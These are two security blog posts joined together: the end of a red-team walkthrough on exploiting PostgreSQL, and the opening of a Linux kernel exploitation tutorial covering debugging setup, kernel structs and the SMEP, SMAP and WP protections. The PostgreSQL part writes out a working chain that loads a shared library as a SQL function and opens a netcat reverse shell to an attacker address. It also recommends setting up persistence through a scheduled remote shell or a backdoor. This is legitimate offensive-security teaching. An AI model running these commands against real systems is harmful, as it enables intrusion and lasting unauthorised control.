0 1 INSERT 0 1 INSERT 0 1 Finally, we save our LOID to disk.
(Change 16391 to match your LOID.) postgres=# select lo_export(16391, '/tmp/pg_exec.so'); lo_export ----------- 1 (1 row) Create our new function using the library we just copied to disk. postgres=# CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT; CREATE FUNCTION Excellent! We should now be able to execute remote commands on our target. pg_exec() won't display the output, so we are just going to run some blind commands to set up our shell. First, make sure there's a listener on your local machine. From another shell window, we can set this up with Ncat or Netcat. $ nc -l -p 4444 Execute the reverse shell. postgres=# select sys('nc -e /bin/sh 172.16.65.140 4444'); We should now have an active reverse shell. To make this a bit more usable, however, we need to spawn a TTY. Lots of ways to do this, but I am going to use Python. It's pretty universal and it works well. python -c 'import pty; pty.spawn("/bin/sh")' $ Achievement unlocked! Privilege escalation If you're lucky, PostgreSQL was running as root, and you now have total control of your target. If not, you only have an unprivileged shell and you need to escalate. I won't get into that here, but there are plenty of ways you can attempt this. First, I'd recommend setting up persistence. Perhaps creating a scheduled job to open a remote shell in case you are disconnected? Or some sort of back-door into a service. The exact method will be customized to the target. Once that's done, you can work on your post-exploitation recon, maybe some kernel exploits, and pivot from there. Hopefully this article helps you get a little deeper understanding of exploiting PostgreSQL during your engagements. Happy hacking! unix-ninja: "Team Hashcat + defender of the realm + artist. CISSP, OSCP, etc. Hack the planet. Break all the things. Thoughts are my own. Passwords are my jam." Source: https://www.unix-ninja.com/p/postgresql_for_red_teams
-
Point of no C3 | Linux Kernel Exploitation - Part 0 In the name of Allah, the most beneficent, the most merciful. HAHIRRITATEDAHAHAHAHAHAHAHA “Appreciate the art, master the craft.” AHAHAHAHOUTDATEDAHAHAHAHAH It’s been more than a year, huh? But I’m back, with “Point of no C3”. Its main focus will be Kernel Exploitation, but that won’t stop it from looking at other things. Summary Chapter I: Environment setup: Preparing the VM Using KGDB to debug the kernel Compiling a simple module What? Few structs Debug a module Chapter II: Overview on security and General understanding: Control Registers SMAP SMEP Write-Protect Paging(a bit of segmentation too) Processes Syscalls IDT(Interrupt Descriptor Table) KSPP KASLR kptr_restrict mmap_min_addr addr_limit Chapter I: Environment setup “No QEMU for you.” Preparing the VM: To begin with, we set up the environment and the VMs in order to experiment on them. For this, Debian was chosen (core only). Other choices include SUSE or CentOS, etc. debian-9.4.0-amd64-netinst.iso 2018-03-10 12:56 291M [X] debian-9.4.0-amd64-xfce-CD-1.iso 2018-03-10 12:57 646M debian-mac-9.4.0-amd64-netinst.iso 2018-03-10 12:56 294M A VM is then created with at least 35GB of space. (Hey, it’s for compiling the kernel!) Installer disc image file (iso): [C:\vm\debian-9.4.0-amd64-netinst.iso [▼]] ⚠ Could not detect which operating system is in this disc image. You will need to specify which operating system will be installed. Once you boot it, you can proceed with Graphical Install, and since we only want the core, stop at Software selection and have only SSH server and standard system utilities selected. And when it’s done, you’ll have your first VM ready.
Debian GNU/Linux 9 Nwwz tty1 Hint: Num Lock on Nwwz login: root Password: Linux Nwwz 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@Nwwz:~# In order to get the latest stable Linux kernel release (4.17.2 at the time of writing) and run it, we start by installing the necessary packages: apt-get install git build-essential fakeroot ncurses* libssl-dev libelf-dev ccache gcc-multilib bison flex bc Downloading the kernel tarball and the patch: root@Nwwz:~# cd /usr/src root@Nwwz:/usr/src# wget "https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/linux-4.17.2.tar.gz" root@Nwwz:/usr/src# wget "https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/patch-4.17.2.gz" Extracting them: root@Nwwz:/usr/src# ls linux-4.17.2.tar.gz patch-4.17.2.gz root@Nwwz:/usr/src# gunzip patch-4.17.2.gz root@Nwwz:/usr/src# gunzip linux-4.17.2.tar.gz root@Nwwz:/usr/src# tar -xvf linux-4.17.2.tar Moving and applying the patch: root@Nwwz:/usr/src# ls linux-4.17.2 linux-4.17.2.tar patch-4.17.2 root@Nwwz:/usr/src# mv patch-4.17.2 linux-4.17.2/ root@Nwwz:/usr/src# cd linux-4*2 root@Nwwz:/usr/src/linux-4.17.2# patch -p1 < patch-4.17.2 Cleaning the directory, copying the running kernel’s config file to the current working directory and changing the config with an ncurses menu: root@Nwwz:/usr/src/linux-4.17.2# make mrproper root@Nwwz:/usr/src/linux-4.17.2# make clean root@Nwwz:/usr/src/linux-4.17.2# cp /boot/config-$(uname -r) .config root@Nwwz:/usr/src/linux-4.17.2# make menuconfig One must then set up the following fields: [*] Networking support ---> Device Drivers ---> Firmware Drivers ---> File systems ---> [X] Kernel hacking ---> printk and dmesg options ---> [X] Compile-time checks and compiler options 
---> ... [*] Compile the kernel with debug info ... ... -*- Kernel debugging ... [*] KGDB: kernel debugger Do you wish to save your new configuration? Press <ESC><ESC> to continue kernel configuration. [< Yes >] < No > Make sure you have similar lines in .config: CONFIG_STRICT_KERNEL_RWX=n CONFIG_DEBUG_INFO=y CONFIG_HAVE_HARDENED_USERCOPY_ALLOCATOR=n CONFIG_HARDENED_USERCOPY=n CONFIG_HARDENED_USERCOPY_FALLBACK=n Before starting the compilation, you can speed it up by splitting the work into multiple jobs (on different processors). nproc hands you the number of processing units available. root@Nwwz:/usr/src/linux-4.17.2# nproc 4 root@Nwwz:/usr/src/linux-4.17.2# make -j4 It will then automatically go through stage 1 & 2: Setup is 17116 bytes (padded to 17408 bytes). System is 4897 kB CRC 2f571cf0 Kernel: arch/x86/boot/bzImage is ready (#1) Building modules, stage 2. MODPOST 3330 modules (SNIP) CC virt/lib/irqbypass.mod.o LD [M] virt/lib/irqbypass.ko root@Nwwz:/usr/src/linux-4.17.2# If, somehow, there’s no stage two, a single command should be executed before moving on: (This normally isn’t required.) 
make modules Installing the modules: root@Nwwz:/usr/src/linux-4.17.2# make modules_install (SNIP) INSTALL sound/usb/usx2y/snd-usb-usx2y.ko INSTALL virt/lib/irqbypass.ko DEPMOD 4.17.0 root@Nwwz:/usr/src/linux-4.17.2# Installing and preparing the kernel for boot: root@Nwwz:/usr/src/linux-4.17.2# make install (SNIP) Found linux image: /boot/vmlinuz-4.17.0 Found initrd image: /boot/initrd.img-4.17.0 Found linux image: /boot/vmlinuz-4.9.0-6-amd64 Found initrd image: /boot/initrd.img-4.9.0-6-amd64 done root@Nwwz:/usr/src/linux-4.17.2# cd /boot root@Nwwz:/boot# mkinitramfs -o /boot/initrd.img-4.17.0 4.17.0 root@Nwwz:/boot# reboot You can then choose the new kernel from the boot screen: *Debian GNU/Linux, with Linux 4.17.0 Debian GNU/Linux, with Linux 4.17.0 (recovery mode) Debian GNU/Linux, with Linux 4.9.0-6-amd64 Debian GNU/Linux, with Linux 4.9.0-6-amd64 (recovery mode) If it fails however, saying that it’s an out-of-memory problem, you can reduce the size of the boot image by stripping the modules (the pattern is quoted so the shell doesn’t expand it before find sees it). root@Nwwz:/boot# cd /lib/modules/4.17.0/ root@Nwwz:/lib/modules/4.17.0# find . -name '*.ko' -exec strip --strip-unneeded {} + root@Nwwz:/lib/modules/4.17.0# cd /boot root@Nwwz:/boot# mkinitramfs -o initrd.img-4.17.0 4.17.0 It’ll then boot successfully. root@Nwwz:~# uname -r 4.17.0 Using KGDB to debug the kernel: Installing ifconfig and running it would be the first thing to do: root@Nwwz:~# apt-get install net-tools (SNIP) root@Nwwz:~# ifconfig ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.150.145 netmask 255.255.255.0 broadcast 192.168.150.255 (SNIP) Back on the Debian machine, transferring vmlinux to the host is done with SCP, or WinSCP in my case. root@Nwwz:~# service ssh start .. Parent directory vmlinux 461 761 KB File With this, you’ll have debug symbols ready, but you still need to enable KGDB for the target kernel.
root@Nwwz:~# cd /boot/grub root@Nwwz:/boot/grub# nano grub.cfg By editing a single line and adding __setup arguments, we can tune the kernel to our needs, such as disabling KASLR and enabling KGDB. Search for the first ‘Debian GNU’ occurrence, make sure it’s the wanted kernel, and add the following to the line marked with [X]: kgdboc=ttyS1,115200 kgdbwait nokaslr. menuentry 'Debian GNU/Linux' --class debian --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-b1a66d11-d729-4f23-99b0-4ddfea0af6c5' { ... echo 'Loading Linux 4.17.0 ...' [X] linux /boot/vmlinuz-4.17.0 root=UUID=b1a66d11-d729-4f23-99b0-4ddfea0af6c5 ro quiet kgdboc=ttyS1,115200 kgdbwait nokaslr echo 'Loading initial ramdisk ...' initrd /boot/initrd.img-4.17.0 } In order to debug the running kernel, another VM similar to the one made previously (Debian) will be created (DebianHOST). Now shut down both VMs in order to set up the pipe: Debian: ⦿ Use named pipe: *---------------------------------------* | \\.\pipe\com_2 | *---------------------------------------* [This end is the server. [▼]] [The other end is a virtual machine. [▼]] ---------------------------------------------7 I/O mode ⧆ Yield CPU on poll Allow the guest operating system to use this serial port in polled mode (as opposed to interrupt mode). DebianHOST: ⦿ Use named pipe: *---------------------------------------* | \\.\pipe\com_2 | *---------------------------------------* [This end is the client. [▼]] [The other end is a virtual machine. [▼]] ---------------------------------------------7 I/O mode ⧆ Yield CPU on poll Allow the guest operating system to use this serial port in polled mode (as opposed to interrupt mode). 
Getting the vmlinux image to DebianHOST after installing necessary packages: root@Nwwz:~# apt-get install gcc gdb git net-tools root@Nwwz:~# cd /home/user root@Nwwz:/home/user# ls vmlinux root@Nwwz:/home/user# gdb vmlinux GNU gdb (Debian 7.12-6) 7.12.0.20161007-git (SNIP) Turning the Debian VM back on results in a message similar to this: KASLR disabled: 'nokaslr' on cmdline. [ 1.571915] KGDB: Waiting for connection from remote gdb... Attaching from DebianHOST’s GDB is then possible: (gdb) set serial baud 115200 (gdb) target remote /dev/ttyS1 Remote debugging using /dev/ttyS1 kgdb_breakpoint () at kernel/debug/debug_core.c:1073 1073 wmb(); /* Sync point after breakpoint */ (gdb) list 1068 noinline void kgdb_breakpoint(void) 1069 { 1070 atomic_inc(&kgdb_setting_breakpoint); 1071 wmb(); /* Sync point before breakpoint */ 1072 arch_kgdb_breakpoint(); 1073 wmb(); /* Sync point after breakpoint */ 1074 atomic_dec(&kgdb_setting_breakpoint); 1075 } 1076 EXPORT_SYMBOL_GPL(kgdb_breakpoint); 1077 (gdb) Know that after typing ‘continue’ in GDB, you won’t be able to control the kernel again unless you use the magic SysRq key to force a SIGTRAP: root@Nwwz:~# echo "g" > /proc/sysrq-trigger And you can see in DebianHOST that it works. (SNIP) [New Thread 459] [New Thread 462] [New Thread 463] [New Thread 476] [New Thread 485] [New Thread 487] Thread 56 received signal SIGTRAP, Trace/breakpoint trap. [Switching to Thread 489] kgdb_breakpoint () at kernel/debug/debug_core.c:1073 1073 wmb(); /* Sync point after breakpoint */ (gdb) Compiling a simple module: A simple Hello 0x00sec module would be created. 
We need to make a directory in root’s home folder, and prepare two files: root@Nwwz:~# mkdir mod root@Nwwz:~# cd mod root@Nwwz:~/mod/# nano hello.c #include <linux/init.h> #include <linux/module.h> static void hello_exit(void){ printk(KERN_INFO "Goodbye!\n"); } static int hello_init(void){ printk(KERN_INFO "Hello 0x00sec!\n"); return 0; } MODULE_LICENSE("GPL"); module_init(hello_init); module_exit(hello_exit); root@Nwwz:~/mod/# nano Makefile obj-m += hello.o KDIR = /lib/modules/$(shell uname -r)/build all: make -C $(KDIR) M=$(PWD) modules clean: rm -rf *.ko *.o *.mod.* *.symvers *.order Then, one can start compiling using ‘make’ and insert/remove the module in the kernel to trigger both init and exit handlers. root@Nwwz:~/mod# make make -C /lib/modules/4.17.0/build M=/root/mod modules make[1]: Entering directory '/usr/src/linux-4.17.2' CC [M] /root/mod/hello.o Building modules, stage 2. MODPOST 1 modules CC /root/mod/hello.mod.o LD [M] /root/mod/hello.ko make[1]: Leaving directory '/usr/src/linux-4.17.2' root@Nwwz:~/mod# insmod hello.ko root@Nwwz:~/mod# rmmod hello.ko The messages are by then saved in the dmesg circular buffer. root@Nwwz:~/mod# dmesg | grep Hello [ 6545.039487] Hello 0x00sec! root@Nwwz:~/mod# dmesg | grep Good [ 6574.452282] Goodbye! To clean the current directory: root@Nwwz:~/mod# make clean What?: The kernel doesn’t rely on the C library we’ve been used to, because it’s judged useless for it. Instead, once the module is linked and loaded in kernel-space (requires root privileges, duh), it can use the header files available in the kernel source tree, which offer a huge number of functions such as printk(), which logs the message and sets its priority, and module_init() and module_exit(), which declare initialization and clean-up functions. Applications usually run with no chance of their variables being changed by another thread.
This certainly isn’t the case for LKMs, since what they offer could be used by multiple processes at the same time, which could lead (if the data dealt with is sensitive, aka in a critical region) to a panic, or worse (better?), a compromise. Few structs: The kernel implements multiple locks; only semaphores and spinlocks will likely be used here. When the semaphore is already held, the thread will sleep, waiting for the lock to be released so it can claim it. That’s why it’s a sleeping lock and, therefore, only used in process context. /* Please don't access any members of this structure directly */ struct semaphore { raw_spinlock_t lock; unsigned int count; struct list_head wait_list; }; It can then be initialized with sema_init() or DEFINE_SEMAPHORE(): #define __SEMAPHORE_INITIALIZER(name, n) \ { \ .lock = __RAW_SPIN_LOCK_UNLOCKED((name).lock), \ .count = n, \ .wait_list = LIST_HEAD_INIT((name).wait_list), \ } static inline void sema_init(struct semaphore *sem, int val) { static struct lock_class_key __key; *sem = (struct semaphore) __SEMAPHORE_INITIALIZER(*sem, val); lockdep_init_map(&sem->lock.dep_map, "semaphore->lock", &__key, 0); } With val being the number of holders that can hold the lock at once. It’s normally set to 1, and a semaphore with a count of 1 is called a mutex. Another type of lock is the spinlock: it keeps the thread spinning instead of sleeping and, for that reason, can be used in interrupt context.
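As a rough userspace analogy for the spinning behaviour (this is not kernel code, and every `sketch_` name is made up for illustration), a test-and-set lock can be written with a C11 `atomic_flag`. A failed attempt never sleeps, the caller simply tries again, which is the property that makes this style of lock usable where sleeping is forbidden:

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical userspace stand-in for a spinlock; NOT the kernel's spinlock_t. */
typedef struct {
    atomic_flag locked;
} sketch_spinlock_t;

/* Put the lock in the unlocked state. */
static void sketch_spin_init(sketch_spinlock_t *l)
{
    assert(l != NULL);
    atomic_flag_clear(&l->locked);
}

/* Single attempt: true if we took the lock, false if it was already held. */
static bool sketch_spin_trylock(sketch_spinlock_t *l)
{
    return !atomic_flag_test_and_set_explicit(&l->locked, memory_order_acquire);
}

/* Busy-wait until the lock is free; the caller never goes to sleep. */
static void sketch_spin_lock(sketch_spinlock_t *l)
{
    while (!sketch_spin_trylock(l))
        ; /* spin */
}

/* Release the lock so that a spinning thread can grab it. */
static void sketch_spin_unlock(sketch_spinlock_t *l)
{
    atomic_flag_clear_explicit(&l->locked, memory_order_release);
}
```

The real kernel lock also deals with preemption, interrupts and lock debugging, none of which is modelled here.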
typedef struct spinlock { union { struct raw_spinlock rlock; #ifdef CONFIG_DEBUG_LOCK_ALLOC # define LOCK_PADSIZE (offsetof(struct raw_spinlock, dep_map)) struct { u8 __padding[LOCK_PADSIZE]; struct lockdep_map dep_map; }; #endif }; } spinlock_t; #define __RAW_SPIN_LOCK_INITIALIZER(lockname) \ { \ .raw_lock = __ARCH_SPIN_LOCK_UNLOCKED, \ SPIN_DEBUG_INIT(lockname) \ SPIN_DEP_MAP_INIT(lockname) } #define __RAW_SPIN_LOCK_UNLOCKED(lockname) \ (raw_spinlock_t) __RAW_SPIN_LOCK_INITIALIZER(lockname) # define raw_spin_lock_init(lock) \ do { *(lock) = __RAW_SPIN_LOCK_UNLOCKED(lock); } while (0) #endif static __always_inline raw_spinlock_t *spinlock_check(spinlock_t *lock) { return &lock->rlock; } #define spin_lock_init(_lock) \ do { \ spinlock_check(_lock); \ raw_spin_lock_init(&(_lock)->rlock); \ } while (0) Enough with locks, what about file_operations? This struct holds the possible operations that can be called on a device/file/entry. When creating a character device by directly calling cdev_alloc() or misc_register(), it has to be provided along with the major (on the first function only) and minor. It is defined as follows: struct file_operations { struct module *owner; loff_t (*llseek) (struct file *, loff_t, int); ssize_t (*read) (struct file *, char __user *, size_t, loff_t *); ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *); ... } __randomize_layout; There are similar structs too, such as inode_operations, block_device_operations and tty_operations… They all provide handlers for userspace calls that target the file/inode/blockdev/tty. Instances of these structs, such as perf_fops or ptmx_fops, are sometimes used by the attacker in order to redirect execution. The kernel provides some structs for lists with different search times. The first is the doubly linked list, list_head; its definition is simple, pointing to the next and previous list_head.
struct list_head { struct list_head *next, *prev; }; While the second is the red-black tree, rb_node, which provides better search time. struct rb_node { unsigned long __rb_parent_color; struct rb_node *rb_right; struct rb_node *rb_left; } __attribute__((aligned(sizeof(long)))); It can be used to find the target value faster: if it’s bigger than the current node (starting from the root), go right, else, go left. The container_of() macro can then be used to extract the container struct. Note: Each device can have multiple minors, but it’ll necessarily have a single major. root@Nwwz:/# cd /dev root@Nwwz:/dev# ls -l total 0 crw------- 1 root root [10], 175 Feb 9 09:24 agpgart | *-> Same major, different minors. | crw-r--r-- 1 root root [10], 235 Feb 9 09:24 autofs drwxr-xr-x 2 root root 160 Feb 9 09:24 block drwxr-xr-x 2 root root 80 Feb 9 09:24 bsg (SNIP) [c]rw-rw-rw- 1 root tty [5], [2] Feb 9 12:06 ptmx | | | | | *--> Minor *---> Character Device *---> Major (SNIP) [b]rw-rw---- 1 root cdrom [11], [0] Feb 9 09:24 sr0 | | | | | *--> Minor *---> Block Device *---> Major (SNIP) Debug a module: When we started gdb, the only image it was aware of was the vmlinux one. It doesn’t know about the loaded module, and doesn’t know about the load location. In order to provide these things and make debugging the module possible, one has to first transfer the target module to DebianHOST. root@Nwwz:~/mod# service ssh start Once that’s done, one should find the different sections and addresses of the LKM in memory: root@Nwwz:~/mod# insmod simple.ko root@Nwwz:~/mod# cd /sys/module/simple/sections root@Nwwz:/sys/module/simple/sections# ls -la total 0 drwxr-xr-x 2 root root 0 Aug 11 06:30 . drwxr-xr-x 5 root root 0 Aug 2 17:55 .. 
-r-------- 1 root root 4096 Aug 11 06:31 .bss -r-------- 1 root root 4096 Aug 11 06:31 .data -r-------- 1 root root 4096 Aug 11 06:31 .gnu.linkonce.this_module -r-------- 1 root root 4096 Aug 11 06:31 __mcount_loc -r-------- 1 root root 4096 Aug 11 06:31 .note.gnu.build-id -r-------- 1 root root 4096 Aug 11 06:31 .orc_unwind -r-------- 1 root root 4096 Aug 11 06:31 .orc_unwind_ip -r-------- 1 root root 4096 Aug 11 06:31 .rodata.str1.1 -r-------- 1 root root 4096 Aug 11 06:31 .rodata.str1.8 -r-------- 1 root root 4096 Aug 11 06:31 .strtab -r-------- 1 root root 4096 Aug 11 06:31 .symtab -r-------- 1 root root 4096 Aug 11 06:31 .text root@Nwwz:/sys/module/simple/sections# cat .text 0xffffffffc054c000 root@Nwwz:/sys/module/simple/sections# cat .data 0xffffffffc054e000 root@Nwwz:/sys/module/simple/sections# cat .bss 0xffffffffc054e4c0 Back to DebianHOST and in gdb: (gdb) add-symbol-file simple.ko 0xffffffffc054c000 -s .data 0xffffffffc054e000 -s .bss 0xffffffffc054e4c0 And that’s it. Chapter II: Overview on security and General understanding “Uuuuh, it’s simple?” Control Registers: CRs are special registers; invisible to the user, they hold important information on the current CPU and the process running on it. x86_32 and x86_64: Keep in mind that their sizes are different (64bit for x86_64, 32bit for x86_32). CR0: x32 and x64: #0: PE(Protected Mode Enable) #1: MP(Monitor co-processor) #2: EM(Emulation) #3: TS(Task Switched) #4: ET(Extension Type) #5: NE(Numeric Error) #6-15: Reserved #16: WP(Write Protect) #17: Reserved #18: AM(Alignment Mask) #19-28: Reserved #29: NW(Not-Write Through) #30: CD(Cache Disable) #31: PG(Paging) x64 only: #32-63: Reserved CR2: Contains only the PFLA (Page Fault Linear Address), which is later read by the do_page_fault function and passed to __do_page_fault to handle it.
dotraplinkage void notrace do_page_fault(struct pt_regs *regs, unsigned long error_code) { unsigned long address = read_cr2(); /* Get the faulting address */ enum ctx_state prev_state; prev_state = exception_enter(); if (trace_pagefault_enabled()) trace_page_fault_entries(address, regs, error_code); __do_page_fault(regs, error_code, address); exception_exit(prev_state); } NOKPROBE_SYMBOL(do_page_fault); CR3: This register contains the physical address of the current process PGD(Page Global Directory), which(once converted back to virtual address) would link to the next level(P4D on five-level page tables or PUD on four-level page tables), but in the end, it’s all to find the same struct, that is, struct page. static inline unsigned long read_cr3_pa(void) { return __read_cr3() & CR3_ADDR_MASK; } static inline unsigned long native_read_cr3_pa(void) { return __native_read_cr3() & CR3_ADDR_MASK; } static inline void load_cr3(pgd_t *pgdir) { write_cr3(__sme_pa(pgdir)); } This is called as an example when an Oops happens, and the kernel calls dump_pagetable(). 
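To make the masking in read_cr3_pa() a bit more tangible, here is a small userspace sketch that splits a raw CR3 value into its two parts. The mask constants are assumptions meant to mirror CR3_ADDR_MASK and CR3_PCID_MASK on a 4.17-era x86_64 build without SME, and the `sketch_` names are made up. Note that the low 12 bits only carry a PCID when CR4.PCIDE is set:

```c
#include <assert.h>
#include <stdint.h>

/* Assumed values, mirroring the x86_64 kernel masks (SME ignored). */
#define SKETCH_CR3_ADDR_MASK 0x7FFFFFFFFFFFF000ULL /* bits 12..62: PGD physical address */
#define SKETCH_CR3_PCID_MASK 0x0000000000000FFFULL /* bits 0..11: PCID when CR4.PCIDE=1 */

/* Physical address of the PGD, i.e. what read_cr3_pa() boils down to. */
static uint64_t sketch_cr3_pgd_pa(uint64_t cr3)
{
    uint64_t pa = cr3 & SKETCH_CR3_ADDR_MASK;
    assert((pa & 0xFFFULL) == 0); /* a page table is always page-aligned */
    return pa;
}

/* Process-context identifier stored in the low bits of CR3. */
static uint16_t sketch_cr3_pcid(uint64_t cr3)
{
    return (uint16_t)(cr3 & SKETCH_CR3_PCID_MASK);
}
```

For instance, a made-up CR3 value of 0x0000000123456005 would give a PGD at physical address 0x123456000 and a PCID of 5. Bit 63 is masked out as well, since it is a control bit rather than part of the address.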
CR4: x32 and x64: #0: VME(Virtual-8086 Mode Extensions) #1: PVI(Protected Mode Virtual Interrupts) #2: TSD(Time Stamp Disable) #3: DE(Debugging Extensions) #4: PSE(Page Size Extensions) #5: PAE(Physical Address Extensions) #6: MCE(Machine Check Enable) #7: PGE(Page Global Enable) #8: PCE(Performance-Monitoring Counter Enable) #9: OSFXSR(OS Support for FXSAVE and FXRSTOR Instructions) #10: OSXMMEXCPT(OS Support for Unmasked SIMD Floating Point Exceptions) #11: UMIP(User-Mode Instruction Prevention) #12: LA57(57-bit Linear Addresses) #13: VMXE(Virtual Machine Extensions Enable) #14: SMXE(Safer Mode Extensions Enable) #15: Reserved #16: FSGSBASE(FSGSBASE Instructions Enable) #17: PCIDE(PCID Enable) #18: OSXSAVE(XSAVE and Processor Extended States Enable) #19: Reserved #20: SMEP(Supervisor Mode Execution Prevention) #21: SMAP(Supervisor Mode Access Prevention) #22: PKE(Protection Key Enable) #23-31: Reserved x64 only: #32-63: Reserved CR1 and CR5 to CR7: Marked as reserved, accessing them results in an Invalid Opcode (#UD) exception. x86_64 only: CR8: Only the first 4 bits are used in this one, while the other 60 bits are reserved (0). Also called TPR (Task Priority Register). Those 4 bits are used when servicing interrupts, checking if the task should really be interrupted. It may or may not, depending on the interrupt’s priority: (IP <= TP ? PASS:SERVICE). Control registers differ from one architecture to another; the examples so far covered two CISC architectures (x86_32, x86_64). Windows itself has many similarities at this level: [image omitted] Things are a little bit different in RISC (ARM for this example): Instead of Control Registers, there are Coprocessors (CP0 to CP15), and each Coprocessor holds 16 registers (C0 to C15). Note however, that only CP14 and CP15 are very important to the system. The MCR and MRC instructions are available to deal with data transfer (write/read).
An example for the TTBR(Translation Table Base Register) is as follows: [image omitted] SMAP: Stands for Supervisor Mode Access Prevention; as its name suggests, it prevents access to user-space from a more privileged context, that is, ring zero. However, since access may still be necessary on certain occasions, a flag is dedicated to this purpose (AC in EFLAGS), along with two instructions to clear or set it: CLAC (clears AC) and STAC (sets AC). [images omitted] static __init int setup_disable_smap(char *arg) { setup_clear_cpu_cap(X86_FEATURE_SMAP); return 1; } __setup("nosmap", setup_disable_smap); It can be disabled with the nosmap boot flag, which clears the CPU’s SMAP capability, or by unsetting the SMAP bit (#21) in CR4. SMEP: An abbreviation for Supervisor Mode Execution Prevention; when running in ring zero, the CPU refuses to execute code located in user-space pages. So both SMEP and SMAP limit what the attacker can do from user-space. static __init int setup_disable_smep(char *arg) { setup_clear_cpu_cap(X86_FEATURE_SMEP); check_mpx_erratum(&boot_cpu_data); return 1; } __setup("nosmep", setup_disable_smep); Knowing if it’s on is as simple as checking /proc/cpuinfo, and it’s the same for SMAP. This protection can be disabled with the nosmep boot flag; it can also be disabled at runtime by unsetting the SMEP bit (#20) in CR4. Write-Protect: Code executing at the highest level of privilege would normally be capable of writing to all pages, even those marked as RO (Read Only). However, a bit in CR0 (the WP bit, #16) stops that from happening by enforcing the read-only check on ring zero as well. Paging(a bit of segmentation too): Linux does separate privileges. The processor can handle up to 4 different rings, starting from 0 which obviously is the most privileged and ending with 3 being the least privileged with limited access to system resources.
However, most operating systems work with only two rings, zero (also called kernel-space) and three (or user-space). Each running process has a struct mm_struct which fully describes its virtual memory space. But when it comes to segmentation and paging, we’re only interested in a few objects in this struct: context, the singly linked list mmap and pgd. typedef struct { u64 ctx_id; atomic64_t tlb_gen; #ifdef CONFIG_MODIFY_LDT_SYSCALL struct rw_semaphore ldt_usr_sem; struct ldt_struct *ldt; #endif #ifdef CONFIG_X86_64 unsigned short ia32_compat; #endif struct mutex lock; void __user *vdso; const struct vdso_image *vdso_image; atomic_t perf_rdpmc_allowed; #ifdef CONFIG_X86_INTEL_MEMORY_PROTECTION_KEYS u16 pkey_allocation_map; s16 execute_only_pkey; #endif #ifdef CONFIG_X86_INTEL_MPX void __user *bd_addr; #endif } mm_context_t; This struct holds a lot of information on the context, including the Local Descriptor Table (LDT), the VDSO image and base address (residing in user-space, hence __user), a read/write semaphore and a mutual exclusion lock (it’s a semaphore too, remember?). struct ldt_struct { struct desc_struct *entries; unsigned int nr_entries; int slot; }; The first element in ldt_struct is a desc_struct pointer, referencing an array of entries, nr_entries of them. However, know that the LDT isn’t usually set up; most processes only use the Global Descriptor Table, which is enough for them.
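Which table and which ring a segment register refers to is encoded in the selector itself. The sketch below decodes one in userspace; the struct and function names are made up for illustration, and the example values quoted afterwards are the user and kernel code selectors typically seen on x86_64 Linux, stated here as an assumption rather than taken from the article:

```c
#include <assert.h>
#include <stdint.h>

/* Fields of an x86 segment selector (the value held in CS, DS, SS, ...). */
struct sketch_selector {
    unsigned index; /* entry number inside the chosen descriptor table */
    unsigned ti;    /* table indicator: 0 = GDT, 1 = LDT */
    unsigned rpl;   /* requested privilege level, i.e. the ring (0..3) */
};

/* Split a 16-bit selector into its three fields. */
static struct sketch_selector sketch_decode_selector(uint16_t sel)
{
    struct sketch_selector s;

    s.rpl = sel & 0x3;        /* bits 0..1 */
    s.ti = (sel >> 2) & 0x1;  /* bit 2 */
    s.index = sel >> 3;       /* bits 3..15 */
    assert(s.index < 8192);   /* the index is 13 bits wide */
    return s;
}
```

Decoding 0x33 yields index 6, GDT, ring 3, while 0x10 yields index 2, GDT, ring 0. The table indicator stays at zero in both, which matches the point that the LDT is rarely involved.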
DEFINE_PER_CPU_PAGE_ALIGNED(struct gdt_page, gdt_page) = { .gdt = { #ifdef CONFIG_X86_64 [GDT_ENTRY_KERNEL32_CS] = GDT_ENTRY_INIT(0xc09b, 0, 0xfffff), [GDT_ENTRY_KERNEL_CS] = GDT_ENTRY_INIT(0xa09b, 0, 0xfffff), [GDT_ENTRY_KERNEL_DS] = GDT_ENTRY_INIT(0xc093, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER32_CS] = GDT_ENTRY_INIT(0xc0fb, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_DS] = GDT_ENTRY_INIT(0xc0f3, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_CS] = GDT_ENTRY_INIT(0xa0fb, 0, 0xfffff), #else [GDT_ENTRY_KERNEL_CS] = GDT_ENTRY_INIT(0xc09a, 0, 0xfffff), [GDT_ENTRY_KERNEL_DS] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_CS] = GDT_ENTRY_INIT(0xc0fa, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_DS] = GDT_ENTRY_INIT(0xc0f2, 0, 0xfffff), [GDT_ENTRY_PNPBIOS_CS32] = GDT_ENTRY_INIT(0x409a, 0, 0xffff), [GDT_ENTRY_PNPBIOS_CS16] = GDT_ENTRY_INIT(0x009a, 0, 0xffff), [GDT_ENTRY_PNPBIOS_DS] = GDT_ENTRY_INIT(0x0092, 0, 0xffff), [GDT_ENTRY_PNPBIOS_TS1] = GDT_ENTRY_INIT(0x0092, 0, 0), [GDT_ENTRY_PNPBIOS_TS2] = GDT_ENTRY_INIT(0x0092, 0, 0), [GDT_ENTRY_APMBIOS_BASE] = GDT_ENTRY_INIT(0x409a, 0, 0xffff), [GDT_ENTRY_APMBIOS_BASE+1] = GDT_ENTRY_INIT(0x009a, 0, 0xffff), [GDT_ENTRY_APMBIOS_BASE+2] = GDT_ENTRY_INIT(0x4092, 0, 0xffff), [GDT_ENTRY_ESPFIX_SS] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), [GDT_ENTRY_PERCPU] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), GDT_STACK_CANARY_INIT #endif } }; 